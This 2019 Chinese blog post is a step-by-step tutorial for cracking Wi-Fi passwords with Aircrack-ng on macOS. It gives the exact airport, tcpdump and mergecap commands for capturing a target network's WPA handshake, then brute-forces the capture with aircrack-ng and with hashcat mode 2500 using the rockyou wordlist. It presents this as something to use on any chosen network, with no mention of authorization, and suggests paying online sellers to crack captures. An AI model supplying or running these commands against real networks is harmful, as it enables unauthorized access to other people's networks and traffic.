2019-03-13

Wi-Fi破解攻击Aircrack-ng工具

大家总觉得黑客什么的很神秘,会破解个Wi-Fi,会破解个软件就算是黑客,其实不然,很多东西都是用脚本,工具完成的,技术含量其实不高。

我先给大家介绍个最基本的Wi-Fi破解工具 Aircrack-ng 下面是他们的官网,推荐大家用任何工具前,自己先去看看人家的网站以及相关的文档,也算是对开发者的尊重吧

https://www.aircrack-ng.org/ 

这款工具应用很广泛,很多其他的工具也是基于这套工具所开发的。例如一个更好玩的工具WiFi-Pumpkin 就用到了这套工具,有机会再介绍。

一、安装

注:关于安装,你可以选择下载源码自己编译,对于一般人来说比较麻烦,这里就不介绍了

OSX:

很简单,安装在你的Macbook 上打开terminal也就是终端,command+空格键,搜索terminal 回车就打开,如果已经安装了homebrew,可忽略下面这条指令,/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

安装完成后直接使用命令,brew install aircrack-ng,即可。

Windows:

Windows下有很多基于这套工具的开发的有GUI的软件。这里就不赘述了

Linux:

​apt-get install aircrack-ng; 也是一条指令安装,至于其他软件管理工具的如Arch Linux:pacman -S aircrack-ng。 你都折腾好了其他的Linux系统,那你肯定知道怎么下载软件。

二、 使用

​你需要一张网卡,https://www.aircrack-ng.org/doku.php?id=compatibility_drivers_old 查询你的网卡是否能用。其实淘宝搜Kali网卡这一类的关键字就行了,macbook 用户,不需要另购网卡哦

​准备工作完成,Mac 下自带了一个工具,可获取Wi-Fi信息,和监听抓取。使用下面这条指令可把airport 工具添加到环境变量,通俗点,就是你打开终端就能用了,

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

完成后,重新打开终端

sudo airport -s

下面是命令的效果,记住你想要破解的wifi的BSSID和Channel(信道)

接下来,使用ifconfig 命令找到你的wifi 网卡名称,一般是en0,en1,以此类推

我的是en0。

最新版本OS X系统Mojave,有问题,当使用airport en0 sniff 6的时候会报错,目前官方没有给出解决方案,也没有大神解决这个问题,我们这里使用另一个工具,tcpdump,更强大哦。

指令如下:

1. export BSSID= 输入刚才记住的那个BSSID (这里是告诉你要抓哪个wifi)

2. airport -z (断开但不关闭Wi-Fi)

3. airport -c 6 (这里是wifi 的信道,就是那个channel)

4. sudo tcpdump "type mgt subtype beacon and ether src BSSID" -I -c 1 -i en0 -w beacon.cap​​(把BSSID换成你的,en0还是en1 根据你的具体情况,就这两处需要改的)

5. tcpdump "ether proto 0x888e and ether host BSSID " -I -U -vvv -i en0 -w handshake.cap​(把BSSID换成你的,en0还是en1 根据你的具体情况,这步是抓握手包,需要一段时间,握手包就是有密码数据的包。)等到显示got 4 (最少是4)就可以control + c停止了。

6. 然后使用这条命令,合并文件,合并后,capture.cap

mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap

7. 至此抓包完成,使用aircrack capture.cap 来查看是否抓到握手包


上图所示,1 handshake 就是说明抓到了握手包。

接下来我们就要对包进行暴力破解

1. 使用aircrack 进行暴力破解,方便,速度慢,使用cpu破解,速度慢

指令:

aircrack-ng -w /字典文件的路径 capture.cap

回车即可,只要你的密码文件够足,就可以破解。你也可以把.cap包发送给淘宝或者论坛找人跑包,一般跑不出来不要钱。

第二种方法,使用hashcat,用GPU跑包,速度更快。

注意的是hashcat不认.cap包,需要转化成 “.hccapx”,自行百度,这里先不说了。

hashcat -m 2500 cap2hccapx.hccapx /Users/jingma/max/tool/rockyou.txt

这里cap2hccapx.hccapx 就是转换后的cap文件,rockyou.txt 就是你的密码文件,回车即可

你可能感兴趣的:(2019-03-13)